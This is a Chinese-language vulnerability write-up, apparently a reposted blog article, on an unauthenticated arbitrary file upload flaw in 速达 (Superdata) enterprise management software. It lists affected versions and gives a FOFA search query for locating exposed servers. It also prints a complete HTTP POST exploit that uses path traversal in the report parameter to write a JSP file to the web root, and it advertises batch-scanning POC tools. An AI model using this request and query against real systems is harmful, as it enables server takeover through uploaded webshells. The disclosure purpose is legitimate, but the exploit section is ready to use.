速达软件全系产品存在任意文件上传漏洞 附POC
创始人
2025-12-24 06:03:24
0

速达软件全系产品存在任意文件上传漏洞 附POC

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 速达软件全系产品简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

速达软件专注中小企业管理软件,产品涵盖进销存软件,财务软件,ERP软件,CRM系统,项目管理软件,OA系统,仓库管理软件等,是中小企业管理市场的佼佼者,提供产品、技术、服务等信息,百万企业共同选择。

2.漏洞描述

速达软件专注中小企业管理软件,产品涵盖进销存软件,财务软件,ERP软件,CRM系统,项目管理软件,OA系统,仓库管理软件等,是中小企业管理市场的佼佼者,提供产品、技术、服务等信息,百万企业共同选择。速达软件全系产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷.

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

速达A3.cloud BAS、速达A3.cloud STD、速达A30.cloud PRO、速达3000.online PRO、速达A4.cloud BAS、速达A4.cloud STD、速达A40.cloud PRO、速达4000.online PRO、速达A5.cloud STD、速达A50.cloud PRO、速达A70.cloud PRO、速达5000.online PRO、速达7000.online PRO

速达软件全系产品存在任意文件上传漏洞

4.fofa查询语句

app="速达软件-公司产品"

5.漏洞复现

漏洞链接:http://127.0.0.1/report/DesignReportSave.jsp?report=../625248.jsp

漏洞数据包:

POST /report/DesignReportSave.jsp?report=../625248.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/octet-stream
Content-Length: 28

<% out.print("984969719");%>

拼接上传路径:http://127.0.0.1/625248.jsp

6.POC&EXP

关注公众号 南风漏洞复现文库 并回复 漏洞复现87 即可获得该POC工具下载地址:

本期漏洞及往期漏洞的批量扫描POC及POC工具箱已经上传知识星球:南风网络安全

7.整改意见

请联系厂商获取修复方案:http://www.superdata.com.cn/

8.往期回顾

金和OA saveAsOtherFormatServlet接口存在任意文件上传漏洞 附POC

智跃人力资源管理系统GenerateEntityFromTable.aspx接口存在SQL注入漏洞 附POC

相关内容

热门资讯

构...  自动驾驶论坛相关信息日程安排2023年12月13日10:00-11:30自动驾驶汽车:构建软件定义...
软...        软件系统测试类型和方法,以及专业系统测试报告获取方式。在软件测试中,有多种类型的测试,...
有... 项目逐渐上线,最近我又深陷在bug中,不能自拔。这种不能自拔有两层意思,第一层是难以自拔,因为尤其在...
2... 12月2日,2023全国大学生软件测试大赛“中慧杯”Web应用测试总决赛于复旦大学成功举办!共有来自...
管...     工业管道在石油化工、天然气、自来水、电力、制药和食品、冶金和能源等行业广泛应用。为了确保管道...
软... 不忘初心,砥砺奋进12月1日下午4时,软件学院2306班十二月主题“青春梦—中国梦”主题班会于恩明楼...
又... ​Hi~欢迎关注:hi爱疯一起发现更多宝藏吧!资源整合丨技术教程丨黑科技丨限免APP深挖那些鲜为人知...
“...                                                   ...
文... 文华财经期货指标公式博易大师软件指标MACD交叉背离指标风险提示:本指标公式仅作为知识分享,不构成任...
速... 速达软件全系产品存在任意文件上传漏洞 附POC免责声明:请勿利用文章内的相关技术从事非法测试,由于传...
文... 文华财经软件指标公式赢顺云指标公式期货指标源码下载风险提示:本指标公式仅作为知识分享,不构成任何投资...
电... 各行各业都在努力寻找提高效率和优势的方法。在电话营销行业,外呼高频是一个常见的问题,它可能会影响销售...
I... 写在前面:今天带来一款日常非常实用的一款软件:微脉水印破解版是一款专门帮助微商制作水印的手机摄影修图...
I... 2023“IT文化艺术节”软件开发初赛         为培养大数据专业类学生软硬结合的产品开发意识...
开... 开源微小卫星飞行软件框架比较分析摘要如今,纳米卫星任务正变得越来越流行,尤其是因为其成本降低。因此,...
互... 电子商务行业的软件测试服务是确保电商平台和应用系统正常运行和满足用户需求的关键一环。随着电子商务的迅...
笔... flomo只用来记录碎片化的想法。evernote(印象笔记)只用来当知识仓库。onenote用来冲...
室... 室内设计软件的学习过程就像爬山一样。 需要一步步、稳步地进行。 首先要掌握基本工具。 它们就像坚实的...
如... 企业信息安全的保障涉及多个方面,其中软件测评和等保测评是两个关键环节。首先,软件测评是针对企业的软件...
提... 在当今信息化社会,软件产品的质量和安全性成为了企业竞争的关键因素。为了确保软件产品满足预期的功能和性...